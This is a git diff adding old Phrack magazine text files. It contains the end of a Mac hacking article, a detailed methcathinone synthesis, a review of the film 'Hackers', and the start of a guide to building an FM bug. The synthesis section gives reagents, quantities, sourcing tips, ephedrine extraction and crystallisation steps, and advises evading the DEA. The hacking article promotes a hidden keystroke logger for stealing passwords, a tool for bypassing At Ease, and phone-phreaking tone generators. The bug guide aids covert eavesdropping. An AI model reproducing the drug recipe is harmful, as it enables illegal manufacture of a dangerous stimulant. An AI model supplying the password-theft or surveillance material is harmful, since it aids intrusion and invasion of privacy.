+improved this design and eventually released 3.0. (I haven't been able to
+find any evidence that a 2.0 was ever released) 3.0 has such cool features
+as reading the preferences file to give you the password, so you can change
+the obnoxious greeting teachers always put to something more sinister. The
+only problem with 3.0 is that some configurations of At Ease only let
+documents be read off of disks; no applications, which means DisEase 3.0
+won't appear, and so you can't run it. However, with 1.0 you don't have to
+actually open the application, you just click six times, so if you use 1.0
+to get to the finder, and then 3.0 to read the passwords, things will work.
+
+Invisible Oasis Installer
+        Oasis is a keystroke recorder, so you can find out passwords.
+However, with the original Oasis, you had to put it in the Extensions
+folder and make it invisible with ResEdit, which takes a while. Invisible
+Oasis Installer, however, installs it where it should be and automatically
+makes it invisible.
+"So everything's wrapped up in a nice neat little _package_, then?"
+-Homer Simpson
+
+Anonymity 2.0 and Repersonalize 1.0
+        Anonymity, version 1.2, was a rather old program whose author has
+long been forgotten that was the best data fork alterer available. It
+removed the personalization to programs. However, in around 1990 someone
+named the Doctor made 2.0, a version with some improvements. Repersonalize
+was made in 1988 (God, Mac hacking programs are old) which reset
+personalization on some of the Microsoft and Claris programs, so you could
+enter a different personalization name. I don't know if it will still work
+on Microsoft Word 6.0.1 and versions of programs released recently, but I
+don't really care because I use Word 5.1a and I'm probably not going to
+upgrade for a while.
+
+Phoney (AKA Phoney4Mac)
+        Phoney is an excellent program that emulates the Blue Box, Red Box,
+Black Box and Green Box tones. There is also Phoney4Newton, which does the
+same thing on the most portable of computers, the Newton.
+
+        That's all I'm covering in this file as far as Mac hacking
+programs. You'll probably want to know where to find all this crap, so here
+are all of the Mac hacking ftp and Web sites I know of:
+Space Rogue's Whacked Mac Archives (http://l0pht.com/~spacerog/index.html)
+        This site, run by Space Rogue is L0pht Heavy Industries' Mac site.
+It is probably the largest and best archive of Mac hacking software
+connected to the Internet. The problem with this is that it can't handle
+more than two anonymous users, meaning that unless you pay to be part of
+L0pht, you will never get into this archive. I've tried getting up at 4:30
+AM, thinking that no one in their right mind would possibly be awake at
+this time, but there is always, somehow, somewhere, two people in Iceland
+or Singapore or somewhere on this site.
+The Mac Hacking Home Page (http://www.aloha.com/~seanw/index.html)
+        This site does not look like much, and it is fairly obvious that
+its maintainer, Sean Warren, is still learning HTML, but it is reliable and
+is a good archive. It is still growing, probably due to the fact that it is
+one of the only Internet Mac hacking sites anyone can get to and upload.
+Kn0wledge Phreak <k0p> (http://www.uccs.edu/~abusby/k0p.html)
+        This is an excellent site and has many good programs. There is one
+catch, however. It's maintainer, Ole Buzzard, is actually getting the files
+from his BBS. So many of the really good files are locked away in the k0p
+BBS, and those of us who can't pay long distance can't get the files. Oh
+well.
+Bone's H/P/C Page o' rama- part of the Cyber Rights Now! home page
+(http://www.lib.iup.edu/~seaman/index.html)
+        While this is hardly a Macintosh hacking site, it's just a hacking
+site, it does have very few Mac files, some of which are hard to get to.
+However, Bone might get expelled because of a long story involving AOHell,
+so this page might not be here. Then again, maybe Bone won't get expelled
+and this site will stay. Never can tell 'bout the future, can you?
+"We predict the future. We invent it."
+        -Nasty government guy on the season premiere of _The X-Files_
+
+Andy Ryder
+Netsurfer and Road Warrior on the Info Highway
+I've pestered Bruce Sterling _and_ R.U. Sirius!
+As mentioned in the alt.devilbunnies FAQ, part I (Look it up!)
+Once scored 29,013,920 points on Missile Command
+
+"This Snow Crash thing- is it a virus, a drug, or a religion?"
+        -Hiro Protagonist
+"What's the difference?"
+        -Juanita Marquez
+
+"...one person's 'cyberpunk' is another's everyday obnoxious teenager with
+some technical skill thrown in..."
+        -Erich Schneider, "alt.cyberpunk Frequently Asked Questions List"
+"More than _some_ technical skill."
+        -Andy Ryder
+
+------------------------------------------------------------------------------
+
+
+                            Making Methcathinone
+
+                                  Compiled
+
+                                by Anonymous
+
+
+Ok, this has got to be the easiest drug made at home (by far).  This is very
+similar to methamphetamine in structure, effect, and use.  Typical doses
+start at 20mg up to 60mg.  Start low, go slow.  Cat can be taken orally (add
+10 mg) or through mucous membranes (nasally).
+
+Ingredients:
+Diet pills, or bronchodilator pills (1000 ea) containing 25mg ephedrine.
+Potassium chromate, or dichromate (easily gotten from chem lab. orange/red)
+Conc. Sulfuric acid - it's up to you where you get this.  Contact me if you
+                      need help locating it.
+Hydrochloric acid or Muriatic acid - Pool supply stores, hardware stores, it
+                                     is used for cleaning concrete.
+Sodium Hydroxide - Hardware stores.  AKA lye.
+Toluene - Hardware store, paint store.
+
+Lab equipment:
+1 liter, 3 neck flask - get it from school or Edmund's Scientific ($20.00)
+125 mL separatory funnel - same as above
+glass tubing - same as above
+
+Buchner funnel - This is a hard to find item, but must schools have at least
+                 one.  They are usually white porcelain or plastic.  They look
+                 like a funnel with a flat disk in the bottom with lots of
+                 holes in it.  If you need one, arrangements can be made.
+Aspirator or vacuum pump - Any lab-ware supply catalog, about $10.00
+
+References to Edmund's Scientific Co, in NJ, are accurate.  You have to go 
+to their "Lab Surplus/Mad Scientist" room.  The prices are incredible.  
+This place is definitely a recommended stopping sight for anybody going 
+through New Jersey.  It is located in "Barrington", about 30 minutes from 
+center city Philadelphia.
+All of the above can be purchased from "The Al-Chymist".  Their number is
+(619)948-4150.  Their address is:       17525 Alder #49
+                                       Hesperia, Ca 92345
+      Call and ask for a catalog.
+
+That's it.  The body of this article is stolen from the third edition of
+"Secrets of Methamphetamine Manufacture" by Uncle Fester.  This is a tried
+and proven method by many people.  If you want a copy of this book, contact
+me.
+
+                  Good luck and keep away from the DEA
+
+
+                          M E T H C A T H I N O N E
+
+             K I T C H E N    I M P R O V I E S E D    C R A N K
+
+
+    The latest designer variant upon the amphetamine molecule to gain
+popularity and publicity is methcathinone, commonly called cat.  This
+substance is remarkably similar to the active ingredient found in the
+leaves of the khat tree which the loyal drug warriors on the network news
+blame for turning peace loving Somalis into murderous psychopaths.  The
+active ingredient in the khat leaves is cathinone, which has the same
+structural relationship to methcathinone that amphetamine has to
+methamphetamine.  It is made by oxidizing ephedrine, while meth can be
+made by reducing ephedrine. 
+
+    The high produced by methcathinone is in many ways similar to
+methamphetamine.  For something so easily made and purified, it is
+actually quite enjoyable.  the main differences between the meth high and
+the methcathinone high are length of action and body fell.  With
+methcathinone, one can expect to still get to sleep about 8 hours after a
+large dose.  On the down side, it definitely gives me the impression that
+the substance raises the blood pressure quite markedly.  This drug may not
+be safe for people with weak hearts of blood vessels.  Be warned! 
+
+    Cat is best made using chrome in the +6 oxidation state as the
+oxidizer. I recall seeing an article in the narco swine's Journal of
+Forensic Science bragging about how they worked out a method for making it
+using permanganate, but that method gives an impure product in low yields. 
+Any of the common hexavalent chrome salts can be used as the oxidizer in
+this reaction.  This list include chrome trioxide (CrO3), sodium or
+potassium chromate (Na2CrO4), and sodium or potassium dichromate
+(Na2Cr2O7).  All of these chemicals are very common.  Chrome trioxide is
+used in great quantities in chrome plating. The chromates are used in
+tanning and leather making. 
+
+    To make methcathinone, the chemist starts with the water extract of
+ephedrine pills.  The concentration of the reactants in this case is not
+critically important, so it is most convenient to use the water extract of
+the pills directly after filtering without any boiling away of the water.
+See the section at the beginning of Chapter 15 [I included this at the end
+of the file] on extracting ephedrine form pills.  Both ephedrine
+hydrochloride and sulfate can be used in this reaction. 
+
+    The water extract of 1000 ephedrine pills is placed into any
+convenient glass container.  A large measuring cup is probably best since
+it has a pouring lip.  Next, 75 grams of any of the above mentioned +6
+chrome compounds are added.  They dissolve quite easily to form a reddish
+or orange colored solution.  Finally, concentrated sulfuric acid is added. 
+If CrO3 is being used, 21 mL is enough for the job.  If one of the
+chromates is being used, 42 mL is called for.  These ingredients are
+thoroughly mixed together, and allowed to sit for several hours with
+occasional stirring. 
+
+    After several hours have passed, lye solution is added to the batch
+until it is strongly basic. Very strong stirring accompanies this process
+to ensure that the cat is converted to the free base.  Next, the batch is
+poured into a sep funnel, and a couple hundred mLs of toluene is added.
+Vigorous shaking, as usual, extracts the cat into the toluene layer.  It
+should be clear to pale yellow in color.  The water layer should be orange
+mixed with green.  The green may settle out as a heavy sludge.  The water
+layer is thrown away, and the toluene layer containing the cat is washed
+once with water, then poured into a beaker. Dry HCl gas is passed through
+the toluene as described in Chapter 5 [I included this at the end of the file]
+to get white crystals of cat.  The yield is between 15 and 20
+grams.  This reaction is scaled up quite easily. 
+
+
+CHAPTER 15 (part of it anyway)
+
+ P R O C E D U R E   F O R   O B T A I N I N G   P U R E   E P H E D R I N E
+                   F R O M   S T I M U L A N T   P I L L S
+
+    In the present chemical supply environment, the best routes for making
+meth start with ephedrine as the raw material.  To use these routes, a
+serious hurdle must first be overcome.  This hurdle is the fact that the
+most easily obtained source of ephedrine, the so-called stimulant or
+bronchodilator pills available cheaply by mail order, are a far cry from
+the pure starting material a quality minded chemist craves.  Luckily,
+there is a simple and very low profile method for separating the fillers
+in these pills from the desired active ingredient they contain. 
+
+    A superficial paging through many popular magazines[New Body is where
+I found it at GNC] reveals them to be brim full of ads
+from mail order outfits offering for sale "stimulant" or "bronchodilator"
+pills. These are the raw materials today's clandestine operator requires
+to manufacture meth without detection.  The crank maker can hide amongst
+the huge herd of people who order these pills for the irritating and
+nauseating high that can be had by eating them as is.  I have heard of a
+few cases where search warrants were obtained against people who ordered
+very large numbers of these pills, but I would think that orders of up to
+a few thousand pills would pass unnoticed.  If larger numbers are
+required, maybe one's friends could join in the effort. 
+
+    The first thing one notices when scanning these ads is the large
+variety of pills offered for sale. When one's purpose is to convert them
+into methamphetamine, it is very easy to eliminate most of the pills
+offered for sale.  Colored pills are automatically rejected because one
+does not want the coloring to be carried into the product.  Similarly,
+capsules are rejected because individually cutting open capsules is just
+too much work. Bulky pills are to be avoided because they contain too much
+filler.  The correct choice is white cross thins, preferably containing
+ephedrine HCl instead of sulfate, because the HCl salt can be used in more
+of the reduction routes than can the sulfate. 
+
+    Once the desired supply of pills is in hand, the first thing which
+should be done is to weigh them.  This will give the manufacturer an idea
+of how much of the pills is filler, and how much is active ingredient. 
+Since each pill contains 25 milligrams of ephedrine HCl, a 1000 lot bottle
+contains 25 grams of active ingredient.  A good brand of white cross thins
+will be around 33% to 40% active ingredient.  25 grams of ephedrine HCl
+may not sound like much, but if it is all recovered from these pills, it
+is enough to make from 1/2 to 3/4 ounce of pure meth.  This is worth three
+or four thousand dollars, not a bad return on the twenty odd dollars a
+thousand lot of such pills costs. [I don't know where he got 3 or 4
+thousand dollars from, but the pills go for about $35.00/1000 now. 2
+months ago they were $25.00 but now they have to do more paper work
+because it is a DEA controlled substance]
+
+    To extract the ephedrine from the pills, the first thing which must be
+done is to grind them into a fine powder.  This pulverization must be
+thorough in order to ensure complete extraction of the ephedrine form the
+filler matrix in which it is bound.  A blender does a fine job of this
+procedure, as will certain brands of home coffee grinders. 
+
+    Next, the powder from 1000 pills is put into a glass beaker, or other
+similar container having a pouring lip, and about 300 mL of distilled
+water is added.  Gentle heat is then applied to the beaker, as for example
+on a stove burner, and with steady stirring the contents of the beaker are
+slowly brought up to a gentle boil.  It is necessary to stir constantly
+because of the fillers will settle to the bottom of the beaker and cause
+burning if not steadily stirred. 
+
+    Once the contents of the beaker have been brought to a boil, it is
+removed from the heat and allowed to settle.  Then the water is poured out
+of the beaker through a piece of filter paper.  The filtered water should
+be absolutely clear.  Next, another 50 mL of water is added to the pill
+filler sludge, and it too is heated with stirring.  Finally, the pill
+sludge is poured into the filter, and the water it contains is allowed to
+filter through.  It too should be absolutely clear, and should be mixed in
+with the first extract.  A little water may be poured over the top of the
+filler sludge to get the last of the ephedrine out of it.  This sludge
+should be nearly tasteless, and gritty in texture.  The water extract
+should taste very bitter, as it contains the ephedrine. 
+
+    The filtered water is now returned to the stove burner, and half of
+the water it contains is gently boiled away.  Once this much water has
+been boiled off, precautions should be taken to avoid burning the
+ephedrine.  The best alternative is to evaporate the water off under a
+vacuum.  If this is not practical with the equipment on hand, the water
+may be poured into a glass baking dish.  This dish is then put into the
+oven with the door cracked open, and the lowest heat applied.  In no time
+at all, dry crystals of ephedrine HCl can be scraped out of the baking
+dish with a razor blade. The serious kitchen experimenter may wish to
+further dry them in a microwave. 
+
+Chapter 5 (The part about the HCl gas)
+
+    A source of anhydrous hydrogen chloride gas is now needed.  The
+chemist will generate his own.  The glassware is set up as in Figure 1. 
+He will have to bend another piece of glass tubing to the shape shown.  It
+should start out about 18 inches long.  One end of it should be pushed
+through a one hole stopper.  A 125 mL sep funnel is the best size.  The
+stoppers and joints must be tight, since pressure must develop inside this
+flask to force the hydrogen chloride gas out through the tubing as it is
+generated. 
+
+    Into the 1000 mL, three-necked flask is placed 200 grams of table
+salt. Then 25% concentrated hydrochloric acid is added to this flask until
+it reaches the level shown in the figure.  The hydrochloric acid must be
+of laboratory grade [I use regular muriatic acid for pools].
+
+Figure 1:
+                   \     /
+                  \   /ķ
+                 ֽ        ӷ   <--125 mL separatory funnel
+                           
+                           
+                 ӷ        ֽ
+                  ķ    Ľ        glass tubing Ŀ
+                    ӷ  ֽ                        
+                                ͻ
+           stopcock->ۺĴ                     Salt and Hydrochloric acid
+stopper ->ķ     \/з      ķ <-1 hole    mixed into a paste by add-
+          ĺ               ĺ    stopper  ing HCL to salt and mixing.
+      Ľ   Ľ    Ľ  ķ         The surface should be rough
+     ֽ                                ӷ        and a good number of holes
+                                                should be poked into the
+            1000 mL, 3 neck flask               paste for long lasting
+                                                generation of HCl gas.
+     ӷ   acid/salt level   ֽ        
+      ķ                             Ľ         
+        ķ                       Ľ           
+           ķ         Ľ              
+                  Ľ                     
+
+
+    Some concentrated sulfuric acid (96-98%) is put into the sep funnel
+and the spigot turned so that 1 mL of concentrated sulfuric acid flows
+into the flask.  It dehydrates the hydrochloric acid and produces hydrogen
+chloride gas. This gas is then forced by pressure through the glass
+tubing. 
+
+    One of the Erlenmeyer flasks containing methamphetamine in solvent is
+placed so that the glass tubing extends into the methamphetamine, almost
+reaching the bottom of the flask.  Dripping in more sulfuric acid as
+needed keeps the flow of gas going to the methamphetamine.  If the flow if
+gas is not maintained, the methamphetamine may solidify inside the glass
+tubing, plugging it up. 
+
+    Within a minute of bubbling, white crystals begin to appear in the
+solution, More and more of them appear as the process continues.  It is an
+awe-inspiring sight.  In a few minutes, the solution becomes as thick as
+watery oatmeal. 
+
+    It is now time to filter out the crystals, which is a two man job. 
+The flask with the crystals in it is removed from the HCl source and
+temporarily set aside.  The three-necked flask is swirled a little to
+spread around the sulfuric acid and then the other Erlenmeyer flask is
+subjected to a bubbling with HCl.  While this flask is being bubbled, the
+crystals already in the other flask are filtered out. 
+
+    The filtering flask and Buchner funnel are set up as shown in figure
+2. The drain stem of the buchner funnel extends all the way through the
+rubber stopper, because methamphetamine has a nasty tendency to dissolve
+rubber stoppers.  This would color the product black.  A piece of filter
+paper covers the flat bottom of the Buchner funnel.  The vacuum is turned
+on and the hose attached to the vacuum nipple.  Then the crystals are
+poured into the Buchner funnel.  The solvent and uncrystallized
+methamphetamine pass through the filter paper and the crystals stay in the
+Buchner funnel as a solid cake.  About 15 mL of solvent is poured into the
+Erlenmeyer flask. the top of the flask is covered with the palm and it is
+shaken to suspend the crystals left clinging to the sides.  This is also
+poured into the Buchner funnel.  Finally, another 15 mL of solvent is
+poured over the top of the filter cake. 
+
+
+Figure 2:
+                              Ŀ
+                                          <-Bchner Funnel
+                              ___________
+                              \           /
+                                \       /
+                                  \   /
+                                 Ŀ
+                                        <--To vacuum
+                                     Ŀ
+                                         
+                                         
+                                       Ŀ
+              Filtering                    
+                  flask-->                
+                                            
+                            
+
+
+    Now the vacuum hose is disconnected and the Buchner funnel, stopper
+and all, is pulled from the filtering flask.  All of the filtered solvent
+is poured back into the erlenmeyer flask it came from.  It is returned to
+the HCl source for more bubbling.  The Buchner funnel is put back into the
+top of the filtering flask.  It still contains the filter cake of
+methamphetamine crystals.  It will now be dried out a little bit.  The
+vacuum is turned back on, the vacuum hose is attached to the filtering
+flask, and the top of the Buchner funnel is covered with the palm or
+section of latex rubber glove.  The vacuum builds and removes most of the
+solvent from the filter cake.  This takes about 60 seconds.  The filter
+cake can now be dumped out onto a glass or China plate (not plastic) by
+tipping the Buchner funnel upside-down and tapping it gently on the plate. 
+
+    And so, the filtering process continues, one flask being filtered
+while the other one is being bubbled with HCl.  Solvent is added to the
+Erlenmeyer flask to keep their volumes at 300 mL.  Eventually, after each
+flask has been bubbled for about seven times, no more crystal will come
+out and the underground chemist is finished. 
+
+    If ether was used as the solvent, the filter cakes on the plates will
+be nearly dry now.  With a knife from the silverware drawer, the cakes are
+cut into eighths.  They are allowed to dry out some more then chopped up
+into powder.  If benzene was used, this process takes longer.  Heat lamps
+may be used to speed up this drying, but no stronger heat source. 
+
+[The above section of chapter 5 is talking about methamphetamine.  You
+could, in most instances, substitute the word methcathinone, but I wanted
+to present the text to you in its exact form.]
+
+
+------------------------------------------------------------------------------
+
+
+Review of "HACKERS"
+
+By Wile Coyote
+
+Sorry, it might be a little long...  cut it to ribbons if you want, most 
+of it is just a rant anyway...  Hope you enjoy it.
+
+  First off, I have to admit that I was biased going into the movie 
+"Hackers"...  I heard that it wasn't going to be up to snuff, but did I 
+let that stop me?  No, of course not...  I sucked up enough courage to 
+stride towards my girlfriend and beg for seven bucks... :)  She ended up 
+wanting to see the movie herself (and sadly, she rather enjoyed it...  
+oh, well, what can you do with the computer illiterate or is it the 
+computer illegitimate?). Now onto....
+
+THE MOVIE
+
+  (Yes, I AM going to give you a second-by-second playback of the 
+movie...  you don't want me to spoil the plot, you say?  Well, don't 
+worry, there is no plot to spoil! :) just kidding, go see it... maybe 
+you'll like it...)
+ 
+  Well, from the very first few seconds, I was unimpressed...  It begins 
+with an FBI raid on some unsuspecting loose (who turns out to be the 
+main character, but that's later) named Zero Cool (can you say "EL1EEEEET 
+WaReZ D00D!!!!!!!1!!!!!111!!!!").  The cinematography was bad...  (Hey, 
+cinematography counts!) But, the acting was worse.  The Feds bust into 
+this home and run up the stairs, all while this lady (the mom) just kind 
+of looks on dumbfounded and keeps saying stuff like "hey, stop that...", 
+or something (is this what a raid is like?  I've never had the pleasure...)
+
+Ok, so the story goes on like this:  The 11 year old kid made a computer 
+virus that he uploads to, I think, the NY stock exchange, and it crashes 
+1,507 computers.  There is a really lame court scene where the kid is 
+sentenced to 7 years probation where he can't use a computer or a 
+touch-tone phone...  That was 1988...
+
+Time passes...  Now it's 1995, and boy have things changed (except the 
+mom... hmmm....).  Now the ex-hacker is allowed to use a computer (his 
+18th b-day) and (somehow) he is just a natural at hacking, and is (gold?) 
+boxing some TV station to change the program on television (yes, I know 
+that all of you super-el33t hackers hack into TV stations when you don't 
+like what's on Ricki Lake!).  N-e-way, while hacking into their 
+super-funky system (the screen just kind of has numbers moving up and 
+down the screen like some kind of hex-editor on acid...)
+he gets into a "hacking battle" with some other hacker called Acid Burn 
+(I don't think I have ever seen such a trippy view of the "Internet"...  
+lots of Very high-end graphics, not very realistic, but it's Hollywood...).
+In the end, the other hacker kicks the shit out of him (he has changed 
+his handle to Crash Override now, just to be cool, i guess) and logs him 
+off the TV station.  Wow, tense... cough...
+
+For those of you who care, let me describe the "hacker" Crash Override:  
+He is definitely super-funky-coole-mo-d-el31t-to-the-max, 'cause he is 
+(kinda) built, and wears VERY wicky (wicky : <adjective> weird plus wacky) 
+clothes, and the CDC might have quite a bit to say about the amount of 
+leather he wears... I mean, there are limits to that kind of stuff, man!
+And to top off his coolness, he is, like, the roller-blade king of the 
+world.  (Not that hackers don't roller-blade, but he does it just Soooo 
+much cooler than I could... :) ).  And yet, here's the nifty part, 
+despite all of his deft coolness, he couldn't get a girl for the life 
+of him (we all morn for him in silent prayer).  
+
+Ok, so now Crash is at school, and he meets Wonderchick (who is 
+EXACTLYFUCKINGLIKEHIM, and is , of course, an 3L31t hackerette... ok, she 
+is Acid Burn, the bitch who "kicked" him out of the TV station, sorry to 
+spoil the suspense).
+
+Now, while at school, he wants to hook up with wonderchick, so he breaks 
+into the school's computer (it must be a fucking Cray to support all of 
+the high-end-type graphics that this dude is pulling up) and gets his 
+English(?) class changed to hers.  So, some other super-d00dcool hacker 
+spots him playing around with the schools computer (it's funny how may 
+elite hackers one can meet in a new york public school...), so he 
+catches up with Crash and invites you to an elite (Oh, if you ever want 
+to see a movie where the word 3l333333333t is used, like a fucking 
+million times, then go see Hackers...) hackerz-only club, complete with 
+million-dollar virtual-reality crap and even a token phreaker trying to 
+red-box a pay-phone with a cassette recorder (never mind that the music is 
+about 197 decibels, the phone can still pick up the box tones...).
+
+What follows is that Crash meets up with some seriously k-rad hackers 
+(Cereal Killer : reminds you of Mork & Mindy meets Dazed and Confused; and  
+Phantom Phreak : who reminds of that gay kid on "my so called life...  
+maybe that was him?";Lord Nikon : the token black hacker... Photographic 
+memory is his super-power).  They talk about k00l pseudo-hacker shit and 
+then a l00ser warez-type guy comes up and tries to be El33t like everybody 
+else.  He is just about the ONLY realistic character in the whole movie.  
+He acts JUST like a wannabe "Hiya D00dz, kan eye b k0ewl too?".  He keeps 
+saying "I need a handle, then I'll be el33t!".  (Why he can't just pick 
+his own handle, like The Avenging Turd or something, is beyond me... He 
+plays lamer better than the kids in Might Morphin Power Rangers...  awesome 
+actor!).  N-e-way, this is where the major discrepancies start.  Ok, 
+first they try to "test" Lamerboy by asking him what the four most used 
+passwords are.  According to the movie, they are "love, sex, god, and 
+secret".  (Hmmmm.... I thought Unix required a 6-8 char. password....).  
+Somehow lamerboy got into a bank and screwed with an ATM machine four 
+states away; all of the hacker chastise him for being stupid and hacking 
+at home (If you watch the movie, you'll notice that the hackers use just 
+about every pay-phone in the city to do their hacking, no, THAT doesn't 
+look suspicious)Next they talk about "hacking a Gibson".  
+(I was informed that they WANTED to use "hacking a Cray", 
+but the Cray people decided that they didn't want THAT kind of publicity.  
+I've never heard of a Gibson in real life, though...).  
+They talk about how k-powerful the security is on a Gibson, and they say 
+that if Lamerboy can crack one, then he gets to be elite.  
+
+Soooooooo.... As the movie Sloooowly progresses (with a lot of Crash 
+loves Wonderchick, Wonderchick hates Crash kind of stuff) Lamerboy 
+finally cracks a Gibson with the password God (never mind a Login name or 
+anything that cool).  Then the cheese begins in full force.  The Gibson 
+is like a total virtual-reality thingy.  Complete with all sorts of cool 
+looking towers and neon lightning bolts and stuff.  Lamerboy hacks into a 
+garbage file (did I mention that the entire world is populated by Macs?  
+Oh, I didn't...   well, hold on :)...).  So, this sets alarms off all 
+over the place (cause a top-secret file is hidden in the garbage, see?), 
+and the main bad-guy, security chief Weasel, heads out to catch him.  He 
+plays around with some neon, star-trek-console, buttons for a while, 
+then calls the "feds" to put a trace on the kid.  La de da, ess catches him 
+in a second, and the kid only gets half of the file, which he hides.
+(to spoil the suspense, yet again, the file is some kind of money getting 
+program, like the kind some LOD members wrote about a long time ago in 
+Phrack, which pulls money from each transaction and puts it into 
+a different account.  Needless to say, the Security Weasel is the guy who 
+wrote it, which is why he needs it back, pronto!).
+
+As we travel along the movie, the hackers keep getting busted for tapping 
+into the Gibson, and they keep getting away.  The "action" heats up when 
+Wonderchick and Crash get into a tiff and they decide to have a hacking 
+contest...  They go all over the city trying their best to fuck with 
+the one fed they don't like....  Brilliant move, eh? The movie kind of 
+reaches a lull when, at a party at Wonderchick's house, they see a k-rad laptop.
+They all fondle over the machine with the same intensity that Captain Kirk 
+gave to fighting Klingons, and frankly, their acting abilities seems 
+to ask "please deposit thirty-five cents for the next three minutes". 
+It was funny listening to the actors, 'cause they didn't know shit about 
+what they were saying...  Here's a clip:
+
+Hey, cool, it's got a 28.8 bps modem! (Yep, a 28.8 bit modem...  Not 
+Kbps, mind you :)...I wonder where they designed a .8 of a bit?)
+
+Yeah! Cool... Hey what kind of chip does it have in it?
+
+A P6!  Three times faster than a Pentium....  Yep, RISC is the wave of 
+the future...  (I laughed so hard.....  Ok, first of all, it is a Mac.  
+Trust me, it has the little apple on the cover.  Second it has a P6, what 
+server she ripped this out of, I dare not ask.  How she got that 
+bastard into a laptop without causing the casing to begin melting is 
+yet another problem...  those get very hot, i just read about them 
+in PC magazine (wow, I must be elite too).  Finally, this is a *magic* P6, 
+because it has RISC coding....  
+
+I kinda wished I had stayed for the credits to see the line: 
+
+Technical advisor                      None.... died on route to work...)
+
+Finally they ask something about the screen, and they find out it is 
+an..... hold your breath.... ACTIVE MATRIX! ... Kick ass!
+
+They do lots of nifty things with their magic laptops (I noticed that they 
+ALL had laptops, and they were ALL Macintoshes.  Now, I'm not one to say 
+you can't hack on a mac, 'cause really you can hack on a TI-81 if you've 
+got the know.... but please, not EVERYONE in the fucking movie 
+has to have the exact same computer (different colors, though... there 
+was a really cool clear one).... it got really sad at the end), and they 
+finally find out what the garbage file that Lamerboy stole was, this time 
+using a hex editor/CAD program of some sort.
+
+As we reach the end of the movie, the hackers enlist the help of two very 
+strangely painted phone phreaks who give the advice to the hackers to send 
+a message to all of the hackers on the 'net, and together, they all 
+kicked some serious ass with the super-nifty-virtual-reality Gibson.
+
+In the end, all of the Hackers get caught except for one, who pirates all 
+of the TV station in the world and gives the police the "real" story...  
+So, the police politely let them go, no need for actually proving that the 
+evidence was real or anything, of course.
+
+So, in the end, I had to say that the movie was very lacking.  It seemed 
+to be more of a Hollywood-type flashy movie, than an actual documentary 
+about hackers.  Yes, I know an ACTUAL movie about hacker would suck, but 
+PLEASE, just a LITTLE bit of reality helps keep the movie grounded.  It 
+may have sucked less if they didn't put flashing, 64 million color, 
+fully-rendered, magically delicious pictures floating all over the screen 
+instead of just a simple "# " prompt at the bottom.  With all of the 
+super-easy access to all of the worlds computers, as depicted in the movie, 
+ANYBODY can be a hacker, regardless of knowledge, commitment, or just 
+plain common sense.  And that's what really made it suck... 
+
+Hope you enjoyed my review of HACKERS!
+
+ 
+
diff --git a/phrack48/4.txt b/phrack48/4.txt
new file mode 100644
index 0000000..0eb801d
--- /dev/null
+++ b/phrack48/4.txt
@@ -0,0 +1,1138 @@
+                         ==Phrack Magazine==
+
+              Volume Seven, Issue Forty-Eight, File 4 of 18
+
+
+                           //   //  /\   //   ====
+                          //   //  //\\ //   ====
+                         ==== //  //  \\/   ====
+
+                     /\   //  // \\    //  /===   ====
+                    //\\ //  //   //  //   \=\   ====
+                   //  \\/    \\ //  //   ===/  ====
+
+                                 PART II
+
+------------------------------------------------------------------------------
+
+ +===================================+      
+ |     CONSTRUCTING AN FM BUG        |
+ |      --------------------         |
+ |                                   |
+ |       written by                  |
+ |    +         Obi-1                |
+ |       *  edjjs@cc.newcastle.edu.au|
+ | *   *                             |
+ |                                   |
+ |   $     Written for Phrack        |
+ |  x$x    if any other magazine     |
+ |   $     wishes to print this      |
+ |  x$x    article they must let the |
+ |         author know in advance    |
+ +===================================+
+
+
+INTRODUCTION
+
+        Before anything this article sole purpose is to teach everyone
+out there about electronics. If you do build it use it at your own risk.
+You will need a decent knowledge of electronics and how to solder some
+components. So if you dont know how to build electronic kits and want a
+bug you can buy one ready-made from me, just write to the e-mail address
+above. Ok enough crap.. so you ask what is an FM bug, well an FM bug is
+like a tiny microphone that can transmit crystal clear audio to a near
+by Walkman/stereo etc. The range of the bug we are making is about 800
+meters, and the battery life is about 100hrs on a normal alkaline
+battery. This bug however is not to be moved while in use, so you cant
+put it in your pocket and walk around. There are other bugs on the
+market but this I found to be the most reliable and relatively easy to
+build. The actual size of the PCB is only 2cm X 2cm! However the battery
+is actually the biggest component. Some parts like the Surface Mount
+resistors, air trimmer and electret microphone maybe hard to find. I
+find mail-order catalogs are the best source of parts as they have a
+bigger range than a store like Dick Smith. I did not actually design
+this circuit, Talking Electronics did, but felt everyone out there might
+like to know how to build one of these. The surface mount resistors can
+be replaced with normal resistors but I recommend using the surface
+mount resistors as they give more of an educational experience to this
+project <puke> <puke> If you dont have a clue how to build a bug and
+have no knowledge of electronics whatsoever e-mail me and you can
+purchase one pre-built from me.
+
+						
+COMPONENT LIST
+
+Resistors
+ 1- 470 R surface mount
+ 1- 10k surface mount
+ 1- 47k surface mount
+ 1- 68k surface mount
+ 1- 1M surface mount
+
+Capacitors
+ 1- 10p disc ceramic
+ 1- 39p disc ceramic
+ 1- 1n disc ceramic
+ 2- 22n disc ceramics
+ 1- 100n monoblock (monolithic)
+ 1- Air trimmer 2p-10p
+
+Other
+ 2- BC 547 transistors
+ 1- 5 turn coil 0.5mm enameled wire
+ 1- electret mic insert- high sensitivity
+ 1- 9V battery snap
+ 1- 15cm tinned copper wire
+ 1- 30cm fine solder
+ 1- 170cm antenna wire
+
+NOTE: use 170cm of electrical wire for the antenna, this length will give
+you maximum range, however since the antenna wire needs to be extended
+when bugging the concealability might be a factor. You can shorten the
+wire's length but this will shorten the range yet make it easier to
+conceal. Weigh the factors and do whats right for you.
+
+
+ASSEMBLY OF CIRCUIT
+
+        First familiarize yourself with the layout of the components.
+Now the only polarized (parts that have to put around the right way) are
+the two transistors, the battery and the microphone. All other parts can
+be soldered either way around. I recommend using this order for assembly
+as it is the most practical and easiest way to build the bug.
+
+                1.  5 surface mount resistors.
+		2.  6 capacitors.
+		3.  2 transistors.
+		4.  air trimmer
+		5.  5-turn coil.
+		6.  battery snap.
+		7.  microphone.
+		8.  antenna wire.
+
+
+READING RESISTOR AND CAPACITOR VALUES
+
+        If you dont know how to read the value of a surface mount
+resistor or disc ceramic capacitor read on.
+
+Surface mount resistor: These have three numbers, with the first two
+digits being multiplied by the third. The third digit represents how
+many zeros after the first two. For example a surface mount resistor
+with code 1-0-5 would mean that the first two digits (1-0) would be
+multiplied by 5 zeros. To give the value 10 00000ohms or 1Mohm.
+
+Capacitor: These are similar to the above but the base number is pF or
+pico farads. eg a capacitor labeled 2-2-3 has the value of 22 000pF.
+
+
+HOW IT WORKS
+
+        The FM bug circuit consists of two stages: an audio amplifier 
+	and a RF oscillator stage.
+
+1.THE AUDIO AMPLIFIER STAGE
+
+        The microphone detects audio in the form of air vibrations that
